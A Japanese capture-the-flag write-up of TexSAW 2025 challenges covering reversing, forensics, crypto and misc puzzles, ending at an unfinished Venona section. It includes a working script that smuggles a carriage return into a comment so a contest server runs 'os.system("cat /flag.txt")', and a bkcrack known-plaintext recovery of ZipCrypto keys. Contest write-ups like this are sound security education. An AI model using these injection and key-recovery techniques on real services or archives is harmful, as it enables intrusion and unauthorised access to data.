この大会は2025/4/12 4:00(JST)~2025/4/14 4:00(JST)に開催されました。
今回もチームで参戦。結果は1719点で553チーム中58位でした。
自分で解けた問題をWriteupとして書いておきます。
Welcome
Discordに入り、#rulesチャネルのルールを見ると、フラグが書いてあった。
texsaw{thanks_for_reading_friends}
My Awesome Python Homework Assignment (misc)
コードの指定行にコメントを挿入できるサービスになっている。Pythonは"\r"(CR)単体も行の終端として扱うため、コメントに"\r"を含めて指定すると、それ以降の文字列はコメント行から外れ、通常のコードとして実行される。サービス側はコメント文字列に含まれる制御文字を除去・拒否していないと思われる。
ls -l /を実行した結果は以下の通り。
total 56 drwxr-xr-x 2 nobody nogroup 4096 Apr 11 09:05 app lrwxrwxrwx 1 nobody nogroup 7 Apr 7 00:00 bin -> usr/bin drwxr-xr-x 2 nobody nogroup 4096 Mar 7 17:30 boot drwxrwxrwt 2 nobody nogroup 100 Apr 11 09:06 dev drwxr-xr-x 31 nobody nogroup 4096 Apr 9 00:31 etc -rw-r--r-- 1 nobody nogroup 30 Apr 11 02:31 flag.txt drwxr-xr-x 2 nobody nogroup 4096 Mar 7 17:30 home lrwxrwxrwx 1 nobody nogroup 7 Apr 7 00:00 lib -> usr/lib lrwxrwxrwx 1 nobody nogroup 9 Apr 7 00:00 lib64 -> usr/lib64 drwxr-xr-x 2 nobody nogroup 4096 Apr 7 00:00 media drwxr-xr-x 2 nobody nogroup 4096 Apr 7 00:00 mnt drwxr-xr-x 2 nobody nogroup 4096 Apr 7 00:00 opt dr-xr-xr-x 237 nobody nogroup 0 Apr 13 02:18 proc drwx------ 2 nobody nogroup 4096 Apr 9 00:19 root drwxr-xr-x 3 nobody nogroup 4096 Apr 7 00:00 run lrwxrwxrwx 1 nobody nogroup 8 Apr 7 00:00 sbin -> usr/sbin drwxr-xr-x 2 nobody nogroup 4096 Apr 7 00:00 srv drwxr-xr-x 2 nobody nogroup 4096 Mar 7 17:30 sys drwxrwxrwt 2 1
cat /flag.txtを実行する。
#!/usr/bin/env python3
import socket


def recvuntil(s, tail):
    """Read from socket ``s`` byte by byte until ``tail`` shows up in the data.

    Returns everything received up to and including ``tail``, decoded as text.
    """
    data = b''
    while tail not in data:
        data += s.recv(1)
    return data.decode()


def _answer(sock, prompt_end, reply):
    """Wait for a prompt ending in ``prompt_end``, echo it locally, send ``reply``."""
    prompt = recvuntil(sock, prompt_end)
    print(prompt + reply)
    sock.sendall(reply.encode() + b'\n')


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('74.207.229.59', 20240))

# The service inserts the submitted text as a comment at the chosen line.
# Python's tokenizer accepts a lone CR as a line ending, so everything after
# the leading "\r" is no longer part of the comment and runs as a statement.
# Root cause on the service side (presumably): only "\n" is considered when
# validating the comment text; rejecting control characters would close this.
number = 8
comment = '\rimport os;os.system("cat /flag.txt")'

_answer(s, b'number: ', str(number))
_answer(s, b': ', comment)
_answer(s, b']: ', 'N')

# Whatever the modified program prints comes back on the same connection.
data = s.recv(1024).decode()
print(data)
実行結果は以下の通り。
----------
def isPalindrome(s):
result = True
for i in range(len(s) // 2):
characterOne = s[i]
characterTwo = s[len(s) - 1 - i]
if characterOne != characterTwo:
result = False
return result
wordToCheck = input("Enter a word to check if it's a palindrome: ")
if isPalindrome(wordToCheck):
print("Yes, it's a palindrome!")
else:
print("No, it's not a palindrome.")
----------
line number: 8
import os;os.system("cat /flag.txt")
----------
def isPalindrome(s):
result = True
for i in range(len(s) // 2):
characterOne = s[i]
characterTwo = s[len(s) - 1 - i]
if characterOne != characterTwo:
result = False
return result
import os;os.system("cat /flag.txt")
wordToCheck = input("Enter a word to check if it's a palindrome: ")
if isPalindrome(wordToCheck):
print("Yes, it's a palindrome!")
else:
print("No, it's not a palindrome.")
----------
add more? [y/N]: N
texsaw{i_got_100%,thanks!!1!}
texsaw{i_got_100%,thanks!!1!}
xorer (rev)
Ghidraでデコンパイルする。
/* Ghidra decompilation of the entry point: prompts for a password, reads it
 * into a 32-byte stack buffer and passes it to check_password(). */
int main(void)
{
  char local_30 [32];
  undefined1 *local_10;

  local_10 = &stack0x00000004;
  printf("Enter password: ");
  /* NOTE(review): the format string at DAT_0804a050 is not shown in this
   * listing; if it is a plain "%s" the read into local_30 is unbounded and
   * can overrun the 32-byte buffer - confirm against the binary. */
  __isoc99_scanf(&DAT_0804a050,local_30);
  check_password(local_30);
  return 0;
}

/* Compares the input against a 12-byte table after XOR-ing each input byte
 * with 0xa5. On success the input itself is printed inside texsaw{...}. */
void check_password(char *input)
{
  uchar key [12];
  int len;   /* declared but never assigned in this listing */
  int i;

  /* Expected value of input[i] ^ 0xa5 for each position. */
  key[0] = 0xcb;
  key[1] = 0x95;
  key[2] = 0xd1;
  key[3] = 0xfa;
  key[4] = 0xd1;
  key[5] = 0xcd;
  key[6] = 0x96;
  key[7] = 0xfa;
  key[8] = 0xc3;
  key[9] = 0xc9;
  key[10] = 0x91;
  key[0xb] = 0xc2;
  /* The length is computed but its result is discarded, so the input length
   * is never checked. */
  strlen(input);
  i = 0;
  while( true ) {
    /* Success as soon as indices 0..7 have matched: key[8]..key[11] are
     * never compared, and whatever was typed is echoed back as the flag. */
    if (7 < i) {
      printf("Correct! Here\'s your flag: texsaw{%s}\n",input);
      return;
    }
    /* Any mismatch in the first 8 bytes leaves the loop and is rejected. */
    if (((int)input[i] ^ 0xa5U) != (uint)key[i]) break;
    i = i + 1;
  }
  puts("Wrong password!");
  return;
}
入力の各文字と0xa5のXORがkeyの各値と一致するかをチェックしている。keyは12バイトあるが、比較されるのは先頭8バイト分だけで、正解時は入力文字列がそのままフラグとして表示される。keyの12バイトすべてを0xa5とXORしてフラグを求める。
#!/usr/bin/env python3
# The twelve bytes stored into key[] by the decompiled check_password().
key = [
    0xcb, 0x95, 0xd1, 0xfa,
    0xd1, 0xcd, 0x96, 0xfa,
    0xc3, 0xc9, 0x91, 0xc2,
]

# check_password() tests input[i] ^ 0xa5 == key[i]; XOR is its own inverse,
# so key[i] ^ 0xa5 gives back the expected input byte.
flag = ''.join(chr(k ^ 0xa5) for k in key)
flag = 'texsaw{%s}' % flag
print(flag)
texsaw{n0t_th3_fl4g}
Too Early 4 Me (rev)
Ghidraでデコンパイルする。
/* Ghidra decompilation of the survey program's entry point. It installs a
 * handler for signal 0xe (14, SIGALRM on Linux - the handler is named
 * sigalrm_handler), asks one y/n question and exits.
 * NOTE(review): no alarm()/timer call is visible in this listing, so nothing
 * shown here raises that signal; presumably it has to be delivered from
 * outside the program - confirm against the binary. */
undefined8 main(void)
{
  long in_FS_OFFSET;
  char local_58 [72];
  long local_10;

  /* Stack canary loaded from fs:0x28, re-checked before returning. */
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  signal(0xe,sigalrm_handler);
  printf(
        "Welcome to the TEXSAW sleep survey! To submit your quick and easy one-minute survey, simply answer the following question [y/n]\nDo you feel existential dread when setting your alarm before bed?\n> "
        );
  /* Bounded read: at most 0x40 bytes into the 72-byte buffer. */
  fgets(local_58,0x40,stdin);
  /* Only the first character of the answer is examined. */
  if (local_58[0] == 'y') {
    puts("Exactly. I\'m glad you share my sentiments.");
  }
  else {
    if (local_58[0] != 'n') {
      printf(
            "I\'m sorry, I couldn\'t parse that response. You should try not wasting my valuable, pr ecious time moving forward.\nGood day."
            );
      goto LAB_001013a0;
    }
    puts("What are you? What are you made of?");
  }
  puts("Your response has been submitted successfully. Thank you for your time.");
LAB_001013a0:
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return 0;
}

/* Signal handler registered in main(); its only action is to call
 * decode_flag(). decode_flag() uses printf/putchar, which are not
 * async-signal-safe functions. */
void sigalrm_handler(void)
{
  decode_flag();
  return;
}

/* Prints the flag by inverting the sbox table: first builds
 * inverse[sbox[i]] = i for i = 0..0xff, then emits
 * inverse[encoded_flag[j]] for j = 0..0x21 (34 bytes). */
void decode_flag(void)
{
  long in_FS_OFFSET;
  int local_120;
  uint local_11c;
  byte abStack_118 [264];
  long local_10;

  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  /* abStack_118 is not initialised before this loop; only the slots indexed
   * by an sbox value get written, and a repeated sbox value keeps the index
   * written last. */
  for (local_120 = 0; local_120 < 0x100; local_120 = local_120 + 1) {
    abStack_118[(int)(uint)(byte)sbox[local_120]] = (byte)local_120;
  }
  printf("Decoded flag: ");
  /* Map every encoded byte back through the inverse table. */
  for (local_11c = 0; local_11c < 0x22; local_11c = local_11c + 1) {
    putchar((uint)abStack_118[(int)(uint)(byte)encoded_flag[(int)local_11c]]);
  }
  /* 10 is '\n'. */
  putchar(10);
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

/* Ghidra data listing of the sbox table referenced by decode_flag()
 * (address, byte value, index); the listing continues on the following lines. */
sbox XREF[3]: Entry Point(*), decode_flag:0010121b(*), decode_flag:00101222(*) 00104060 63 7c 77 undefine 7b f2 6b 6f c5 30 00104060 63 undefined163h [0] XREF[3]: Entry Point(*), decode_flag:0010121b(*), decode_flag:00101222(*) 00104061 7c undefined17Ch [1] 00104062 77 undefined177h [2] 00104063 7b undefined17Bh [3] 00104064 f2 undefined1F2h [4] 00104065 6b undefined16Bh [5] 00104066 6f undefined16Fh [6] 
00104067 c5 undefined1C5h [7] 00104068 30 undefined130h [8] 00104069 01 undefined101h [9] 0010406a 67 undefined167h [10] 0010406b 2b undefined12Bh [11] 0010406c fe undefined1FEh [12] 0010406d d7 undefined1D7h [13] 0010406e ab undefined1ABh [14] 0010406f 76 undefined176h [15] 00104070 ca undefined1CAh [16] 00104071 82 undefined182h [17] 00104072 c9 undefined1C9h [18] 00104073 7d undefined17Dh [19] 00104074 fa undefined1FAh [20] 00104075 59 undefined159h [21] 00104076 47 undefined147h [22] 00104077 f0 undefined1F0h [23] 00104078 ad undefined1ADh [24] 00104079 d4 undefined1D4h [25] 0010407a a2 undefined1A2h [26] 0010407b af undefined1AFh [27] 0010407c 9c undefined19Ch [28] 0010407d a8 undefined1A8h [29] 0010407e 51 undefined151h [30] 0010407f a3 undefined1A3h [31] 00104080 40 undefined140h [32] 00104081 8f undefined18Fh [33] 00104082 92 undefined192h [34] 00104083 9d undefined19Dh [35] 00104084 38 undefined138h [36] 00104085 f5 undefined1F5h [37] 00104086 bc undefined1BCh [38] 00104087 b6 undefined1B6h [39] 00104088 da undefined1DAh [40] 00104089 21 undefined121h [41] 0010408a 10 undefined110h [42] 0010408b ff undefined1FFh [43] 0010408c f3 undefined1F3h [44] 0010408d d2 undefined1D2h [45] 0010408e cd undefined1CDh [46] 0010408f 0c undefined10Ch [47] 00104090 13 undefined113h [48] 00104091 ec undefined1ECh [49] 00104092 5f undefined15Fh [50] 00104093 97 undefined197h [51] 00104094 44 undefined144h [52] 00104095 17 undefined117h [53] 00104096 c4 undefined1C4h [54] 00104097 a7 undefined1A7h [55] 00104098 7e undefined17Eh [56] 00104099 3d undefined13Dh [57] 0010409a 64 undefined164h [58] 0010409b 5d undefined15Dh [59] 0010409c 19 undefined119h [60] 0010409d 73 undefined173h [61] 0010409e 60 undefined160h [62] 0010409f 81 undefined181h [63] 001040a0 4f undefined14Fh [64] 001040a1 dc undefined1DCh [65] 001040a2 22 undefined122h [66] 001040a3 2a undefined12Ah [67] 001040a4 90 undefined190h [68] 001040a5 88 undefined188h [69] 001040a6 46 undefined146h [70] 001040a7 ee 
undefined1EEh [71] 001040a8 b8 undefined1B8h [72] 001040a9 14 undefined114h [73] 001040aa de undefined1DEh [74] 001040ab 5e undefined15Eh [75] 001040ac 0b undefined10Bh [76] 001040ad db undefined1DBh [77] 001040ae e0 undefined1E0h [78] 001040af 32 undefined132h [79] 001040b0 3a undefined13Ah [80] 001040b1 0a undefined10Ah [81] 001040b2 49 undefined149h [82] 001040b3 06 undefined106h [83] 001040b4 24 undefined124h [84] 001040b5 5c undefined15Ch [85] 001040b6 c2 undefined1C2h [86] 001040b7 d3 undefined1D3h [87] 001040b8 ac undefined1ACh [88] 001040b9 62 undefined162h [89] 001040ba 91 undefined191h [90] 001040bb 95 undefined195h [91] 001040bc 0e undefined10Eh [92] 001040bd 61 undefined161h [93] 001040be 35 undefined135h [94] 001040bf 57 undefined157h [95] 001040c0 b9 undefined1B9h [96] 001040c1 86 undefined186h [97] 001040c2 c3 undefined1C3h [98] 001040c3 1c undefined11Ch [99] 001040c4 1d undefined11Dh [100] 001040c5 9e undefined19Eh [101] 001040c6 42 undefined142h [102] 001040c7 68 undefined168h [103] 001040c8 41 undefined141h [104] 001040c9 99 undefined199h [105] 001040ca 2d undefined12Dh [106] 001040cb 0f undefined10Fh [107] 001040cc b0 undefined1B0h [108] 001040cd 54 undefined154h [109] 001040ce bb undefined1BBh [110] 001040cf 16 undefined116h [111] 001040d0 3e undefined13Eh [112] 001040d1 7a undefined17Ah [113] 001040d2 4b undefined14Bh [114] 001040d3 8b undefined18Bh [115] 001040d4 8a undefined18Ah [116] 001040d5 79 undefined179h [117] 001040d6 52 undefined152h [118] 001040d7 7f undefined17Fh [119] 001040d8 5b undefined15Bh [120] 001040d9 8d undefined18Dh [121] 001040da 8c undefined18Ch [122] 001040db 7d undefined17Dh [123] 001040dc 5a undefined15Ah [124] 001040dd 4e undefined14Eh [125] 001040de 4c undefined14Ch [126] 001040df 7e undefined17Eh [127] 001040e0 00 undefined100h [128] 001040e1 00 undefined100h [129] 001040e2 00 undefined100h [130] 001040e3 00 undefined100h [131] 001040e4 00 undefined100h [132] 001040e5 00 undefined100h [133] 001040e6 00 
undefined100h [134] 001040e7 00 undefined100h [135] 001040e8 00 undefined100h [136] 001040e9 00 undefined100h [137] 001040ea 00 undefined100h [138] 001040eb 00 undefined100h [139] 001040ec 00 undefined100h [140] 001040ed 00 undefined100h [141] 001040ee 00 undefined100h [142] 001040ef 00 undefined100h [143] 001040f0 00 undefined100h [144] 001040f1 00 undefined100h [145] 001040f2 00 undefined100h [146] 001040f3 00 undefined100h [147] 001040f4 00 undefined100h [148] 001040f5 00 undefined100h [149] 001040f6 00 undefined100h [150] 001040f7 00 undefined100h [151] 001040f8 00 undefined100h [152] 001040f9 00 undefined100h [153] 001040fa 00 undefined100h [154] 001040fb 00 undefined100h [155] 001040fc 00 undefined100h [156] 001040fd 00 undefined100h [157] 001040fe 00 undefined100h [158] 001040ff 00 undefined100h [159] 00104100 00 undefined100h [160] 00104101 00 undefined100h [161] 00104102 00 undefined100h [162] 00104103 00 undefined100h [163] 00104104 00 undefined100h [164] 00104105 00 undefined100h [165] 00104106 00 undefined100h [166] 00104107 00 undefined100h [167] 00104108 00 undefined100h [168] 00104109 00 undefined100h [169] 0010410a 00 undefined100h [170] 0010410b 00 undefined100h [171] 0010410c 00 undefined100h [172] 0010410d 00 undefined100h [173] 0010410e 00 undefined100h [174] 0010410f 00 undefined100h [175] 00104110 00 undefined100h [176] 00104111 00 undefined100h [177] 00104112 00 undefined100h [178] 00104113 00 undefined100h [179] 00104114 00 undefined100h [180] 00104115 00 undefined100h [181] 00104116 00 undefined100h [182] 00104117 00 undefined100h [183] 00104118 00 undefined100h [184] 00104119 00 undefined100h [185] 0010411a 00 undefined100h [186] 0010411b 00 undefined100h [187] 0010411c 00 undefined100h [188] 0010411d 00 undefined100h [189] 0010411e 00 undefined100h [190] 0010411f 00 undefined100h [191] 00104120 00 undefined100h [192] 00104121 00 undefined100h [193] 00104122 00 undefined100h [194] 00104123 00 undefined100h [195] 00104124 00 undefined100h 
[196] 00104125 00 undefined100h [197] 00104126 00 undefined100h [198] 00104127 00 undefined100h [199] 00104128 00 undefined100h [200] 00104129 00 undefined100h [201] 0010412a 00 undefined100h [202] 0010412b 00 undefined100h [203] 0010412c 00 undefined100h [204] 0010412d 00 undefined100h [205] 0010412e 00 undefined100h [206] 0010412f 00 undefined100h [207] 00104130 00 undefined100h [208] 00104131 00 undefined100h [209] 00104132 00 undefined100h [210] 00104133 00 undefined100h [211] 00104134 00 undefined100h [212] 00104135 00 undefined100h [213] 00104136 00 undefined100h [214] 00104137 00 undefined100h [215] 00104138 00 undefined100h [216] 00104139 00 undefined100h [217] 0010413a 00 undefined100h [218] 0010413b 00 undefined100h [219] 0010413c 00 undefined100h [220] 0010413d 00 undefined100h [221] 0010413e 00 undefined100h [222] 0010413f 00 undefined100h [223] 00104140 00 undefined100h [224] 00104141 00 undefined100h [225] 00104142 00 undefined100h [226] 00104143 00 undefined100h [227] 00104144 00 undefined100h [228] 00104145 00 undefined100h [229] 00104146 00 undefined100h [230] 00104147 00 undefined100h [231] 00104148 00 undefined100h [232] 00104149 00 undefined100h [233] 0010414a 00 undefined100h [234] 0010414b 00 undefined100h [235] 0010414c 00 undefined100h [236] 0010414d 00 undefined100h [237] 0010414e 00 undefined100h [238] 0010414f 00 undefined100h [239] 00104150 00 undefined100h [240] 00104151 00 undefined100h [241] 00104152 00 undefined100h [242] 00104153 00 undefined100h [243] 00104154 00 undefined100h [244] 00104155 00 undefined100h [245] 00104156 00 undefined100h [246] 00104157 00 undefined100h [247] 00104158 00 undefined100h [248] 00104159 00 undefined100h [249] 0010415a 00 undefined100h [250] 0010415b 00 undefined100h [251] 0010415c 00 undefined100h [252] 0010415d 00 undefined100h [253] 0010415e 00 undefined100h [254] 0010415f 00 undefined100h [255] encoded_flag XREF[3]: Entry Point(*), decode_flag:00101273(*), decode_flag:0010127a(*) 00104020 8a 9e 5b 
undefine 8b 86 7f 7d 41 16 00104020 8a undefined18Ah [0] XREF[3]: Entry Point(*), decode_flag:00101273(*), decode_flag:0010127a(*) 00104021 9e undefined19Eh [1] 00104022 5b undefined15Bh [2] 00104023 8b undefined18Bh [3] 00104024 86 undefined186h [4] 00104025 7f undefined17Fh [5] 00104026 7d undefined17Dh [6] 00104027 41 undefined141h [7] 00104028 16 undefined116h [8] 00104029 7f undefined17Fh [9] 0010402a 57 undefined157h [10] 0010402b 8b undefined18Bh [11] 0010402c 99 undefined199h [12] 0010402d 68 undefined168h [13] 0010402e bb undefined1BBh [14] 0010402f 86 undefined186h [15] 00104030 b0 undefined1B0h [16] 00104031 99 undefined199h [17] 00104032 1c undefined11Ch [18] 00104033 99 undefined199h [19] 00104034 16 undefined116h [20] 00104035 79 undefined179h [21] 00104036 8b undefined18Bh [22] 00104037 57 undefined157h [23] 00104038 54 undefined154h [24] 00104039 79 undefined179h [25] 0010403a 1c undefined11Ch [26] 0010403b 41 undefined141h [27] 0010403c 57 undefined157h [28] 0010403d 8b undefined18Bh [29] 0010403e 7f undefined17Fh [30] 0010403f 86 undefined186h [31] 00104040 68 undefined168h [32] 00104041 4e undefined14Eh [33]
decode_flag関数と同様の処理を実行し、フラグを取得する。
#!/usr/bin/env python3
# sbox as dumped from the binary: 128 populated entries followed by 128 zero
# bytes (indices 128..255 in the Ghidra listing).
sbox = [
    0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76,
    0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA8, 0x51, 0xA3,
    0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2, 0xCD, 0x0C,
    0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73, 0x60, 0x81,
    0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB, 0xE0, 0x32,
    0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0x0E, 0x61, 0x35, 0x57,
    0xB9, 0x86, 0xC3, 0x1C, 0x1D, 0x9E, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16,
    0x3E, 0x7A, 0x4B, 0x8B, 0x8A, 0x79, 0x52, 0x7F, 0x5B, 0x8D, 0x8C, 0x7D, 0x5A, 0x4E, 0x4C, 0x7E,
] + [0x00] * 128

# The 34 encoded bytes that decode_flag() walks over.
encoded_flag = [
    0x8A, 0x9E, 0x5B, 0x8B, 0x86, 0x7F, 0x7D, 0x41, 0x16, 0x7F, 0x57, 0x8B, 0x99, 0x68, 0xBB, 0x86,
    0xB0, 0x99, 0x1C, 0x99, 0x16, 0x79, 0x8B, 0x57, 0x54, 0x79, 0x1C, 0x41, 0x57, 0x8B, 0x7F, 0x86,
    0x68, 0x4E,
]

# Same size as abStack_118 in the decompiled function. Build the inverse
# lookup in ascending index order so that, as in the binary, a repeated sbox
# value ends up mapped to the highest index that holds it.
stack = [0] * 264
for position, value in enumerate(sbox[:256]):
    stack[value] = position

# Map each encoded byte back through the inverse table.
flag = ''.join(chr(stack[code]) for code in encoded_flag[:34])
print(flag)
texsaw{how_signalicious_much_swag}
Freaky Flower (Forensics)
psdファイルをhttps://www.photopea.com/で開く。テキストレイヤーとして以下の名称が設定されている。
sneaky_sunflowers_sure_suck
texsaw{sneaky_sunflowers_sure_suck}
Favorite Flower (Forensics)
画像をよく見ると、ひまわりの花の下にRingmasterと書いてある。
texsaw{ringmaster}
Hidden beneath the wavs (Forensics)
$ zipinfo secret_note.zip Archive: secret_note.zip Zip file size: 192762 bytes, number of entries: 1 -rw-r--r-- 3.0 unx 192566 BX stor 25-Mar-29 09:25 aaaac.wav 1 file, 192566 bytes uncompressed, 192566 bytes compressed: 0.0%
無圧縮で、7-Zip File Managerで見ると、圧縮方式がZipCrypto Storeになっている。
無圧縮(stor)なので、暗号化される前のデータはwavファイルそのものになる。一般的なPCM・モノラルのwavファイルだと仮定すれば、ファイルサイズから先頭24バイトを推測できる。
先頭24バイトは以下のような形式になる。
RIFF<ファイルサイズ-8のリトルエンディアン文字列(4バイト)>WAVEfmt<space>\x10\x00\x00\x00\x01\x00\x01\x00
ZipCryptoは既知平文攻撃に弱く、bkcrackは12バイト以上(うち連続8バイト以上)の既知平文があれば内部鍵を復元できるので、この24バイトを使って既知平文攻撃ができそう。
>>> (192566 - 8).to_bytes(4, 'little').hex() '2ef00200'
$ echo 524946462ef0020057415645666d74201000000001000100 | xxd -r -p > plain_head $ ./bkcrack -C secret_note.zip -c aaaac.wav -p plain_head bkcrack 1.5.0 - 2022-07-07 [08:18:38] Z reduction using 17 bytes of known plaintext 100.0 % (17 / 17) [08:18:38] Attack on 437542 Z values at index 6 Keys: f93bbe2a 0da8b6e7 2ae51dac 73.8 % (322734 / 437542) [08:25:50] Keys f93bbe2a 0da8b6e7 2ae51dac
内部の鍵が得られるので、それを使って、aaaac.wavを復号する。
$ ./bkcrack -C secret_note.zip -c aaaac.wav -k f93bbe2a 0da8b6e7 2ae51dac -d aaaac.wav bkcrack 1.5.0 - 2022-07-07 [08:29:48] Writing deciphered data aaaac.wav (maybe compressed) Wrote deciphered data. $ exiftool aaaac.wav ExifTool Version Number : 13.00 File Name : aaaac.wav Directory : . File Size : 193 kB File Modification Date/Time : 2025:04:13 08:29:48+09:00 File Access Date/Time : 2025:04:13 08:30:55+09:00 File Inode Change Date/Time : 2025:04:13 08:29:48+09:00 File Permissions : -rwxrwxrwx File Type : WAV File Type Extension : wav MIME Type : audio/x-wav Encoding : Microsoft PCM Num Channels : 1 Sample Rate : 32880 Avg Bytes Per Sec : 65760 Bits Per Sample : 16 Comment : TexSAW{Th3_s1l3nce_SH4ll_l3ad_TH3_W4y} Duration : 2.93 s
TexSAW{Th3_s1l3nce_SH4ll_l3ad_TH3_W4y}
Scrambled Packets (Forensics)
icmpでフィルタリングして、1バイトのdataが付いているものだけ見ると、フラグの断片があるように見える。ただし時系列順には並んでいないようなので、Sequence Numberの順に並べ替えればフラグになりそう。
#!/usr/bin/env python3
from scapy.all import *

packets = rdpcap('cap.pcap')

# One slot per flag character; the ICMP sequence number is the slot index.
flag = [b''] * 24
for p in packets:
    # Only ICMP packets that carry a payload are of interest.
    if not (p.haslayer(ICMP) and p.haslayer(Raw)):
        continue
    # Keep the single-byte payloads sent by the one source host.
    if p[IP].src != '147.182.177.196' or len(p[Raw].load) != 1:
        continue
    # Capture order is not flag order, so place each byte by sequence number.
    flag[p[ICMP].seq] = p[Raw].load

flag = b''.join(flag).decode()
print(flag)
TexSAW{not_the_fake_one}
who-made-this-anyway (Crypto)
問題文にあるGiovan Battista Bellaso polyalphabetic substitution cipherで検索すると、Vigenere cipherが見つかる。
https://www.dcode.fr/vigenere-cipherで復号すると、鍵が以下の場合に復号できた。
SAWTEX
復号結果は以下の通り。
OMGHEYYOUFIGUREDOUTTHECIPHERTHEKEYWASNTTOOHARDTOFINDWASITYOUSHOULDBEVERYPROUDOFYOURSELFALLYOUHADTODOWASUSETHEKASISKITESTTOFINDTHELENGTHOFTHEKEYTHENDIVIDETHEMESSAGEINTOSEGMENTSOFTHEKEYSIZETHENUSEALITTLEBITOFFREQUENCYANALYSISTOFINDTHEKEYONCEYOUHAVETHEKEYITSPRETTYSIMPLEIDONTREALLYNEEDTOTELLYOUTHATTHOUGHSINCEYOUREALREADYHEREANYWAYISUPPOSEYOUAREHERETOFINDTHEFLAGWELLIWILLTELLYOUWHATTHEFLAGISTHEFLAGISOMGHEYYOUFOUNDME
この文章からフラグ部分を抜き出す。
texsaw{OMGHEYYOUFOUNDME}
key-reuse (Crypto)
同じ鍵で2つの平文がXORされている。この場合、2つの暗号文同士をXORすると鍵が打ち消されて平文同士のXORになるので、https://github.com/SpiderLabs/cribdragのツール(Python2)を使って、平文を推測しながら復号する。まず2つの暗号文をXORする。
$ python2 xorstrings.py 200d1d2014071e152b1c1e022d2615100617112a0804 20000035191102062C1016091334110B1703182A020D 000d1d150d161c13070c080b3e12041b111409000a09 $ python2 cribdrag.py 000d1d150d161c13070c080b3e12041b111409000a09 Your message is currently: 0 ______________________ Your key is currently: 0 ______________________ Please enter your crib: texsaw{ *** 0: "theflag" 1: "yxm~wkh" 2: "ipue}d|" *** 3: "ahnorpw" 4: "ysd`f{s" 5: "byktmp" 6: "hvi|E" 7: "gbt{jIi" 8: "sipx_e" 9: "xmsMss`" 10: "|nFaelj" 11: "[jwzfo" 12: "Jw|hpcr" 13: "facbu~{" 14: "p~ighwq" 15: "otlza}r" Enter the correct position, 'none' for no match, or 'end' to quit: 0 Is this crib part of the message or key? Please enter 'message' or 'key': key Your message is currently: 0 theflag_______________ Your key is currently: 0 texsaw{_______________
ここまで来て推測が難しくなってきたので、鍵の文字列も確認する。
>>> from Crypto.Util.strxor import strxor
>>> c1 = bytes.fromhex('200d1d2014071e152b1c1e022d2615100617112a0804')
>>> c2 = bytes.fromhex('20000035191102062C1016091334110B1703182A020D')
>>> m1 = b'texsaw{'
>>> m2 = b'theflag'
>>> strxor(c1[:7], m1)
b'TheSupe'
>>> strxor(b'TheSuper', c1[:8])
b'texsaw{g'
Please enter your crib: g
*** 0: "g"
*** 1: "j"
*** 2: "z"
*** 3: "r"
*** 4: "j"
*** 5: "q"
6: "{"
*** 7: "t"
8: "`"
*** 9: "k"
*** 10: "o"
*** 11: "l"
*** 12: "Y"
*** 13: "u"
*** 14: "c"
15: "|"
*** 16: "v"
*** 17: "s"
*** 18: "n"
*** 19: "g"
*** 20: "m"
*** 21: "n"
Enter the correct position, 'none' for no match, or 'end' to quit: 7
Is this crib part of the message or key? Please enter 'message' or 'key': key
Your message is currently:
0 theflagt______________
Your key is currently:
0 texsaw{g______________
Please enter your crib: going
0: "gbt{j"
1: "jr|cq"
2: "zzdx{"
3: "rbrt"
4: "jyu}`"
*** 5: "qszik"
6: "{|nbo"
*** 7: "thefl"
8: "`caeY"
*** 9: "kgbPu"
10: "odW|c"
11: "lQ{j|"
12: "Y}muv"
13: "ukrs"
*** 14: "ctxzn"
15: "|~}gg"
16: "v{`nm"
*** 17: "sfidn"
Enter the correct position, 'none' for no match, or 'end' to quit: 7
Is this crib part of the message or key? Please enter 'message' or 'key': key
Your message is currently:
0 theflagthefl__________
Your key is currently:
0 texsaw{going__________
Please enter your crib: flag
0: "fa|r"
*** 1: "kqtj"
2: "{ylq"
3: "saw{"
4: "kz}t"
5: "ppr`"
6: "zfk"
*** 7: "ukmo"
8: "a`il"
*** 9: "jdjY"
10: "ng_u"
*** 11: "mRsc"
12: "X~e|"
*** 13: "thzv"
*** 14: "bwps"
15: "}}un"
*** 16: "wxhg"
*** 17: "ream"
*** 18: "olkn"
Enter the correct position, 'none' for no match, or 'end' to quit: 10
Is this crib part of the message or key? Please enter 'message' or 'key': message
Your message is currently:
0 theflagtheflag________
Your key is currently:
0 texsaw{going_u________
Please enter your crib: theflagt
0: "texsaw{g"
1: "yupkz}ts"
2: "i}hppr`x"
3: "aeszfk|"
4: "y~yukmo"
5: "btva`ilJ"
6: "h{bjdjYf"
7: "going_up"
*** 8: "sdmmRsco"
9: "x`nX~e|e"
10: "|c[thzv`"
11: "Vwbwps}"
12: "Jza}}unt"
13: "fl~wxhg~"
14: "pstream}"
Enter the correct position, 'none' for no match, or 'end' to quit: 14
Is this crib part of the message or key? Please enter 'message' or 'key': message
Your message is currently:
0 theflagtheflagtheflagt
Your key is currently:
0 texsaw{going_upstream}
texsaw{going_upstream}
Venona (Crypto)
暗号文は以下の3つがある。
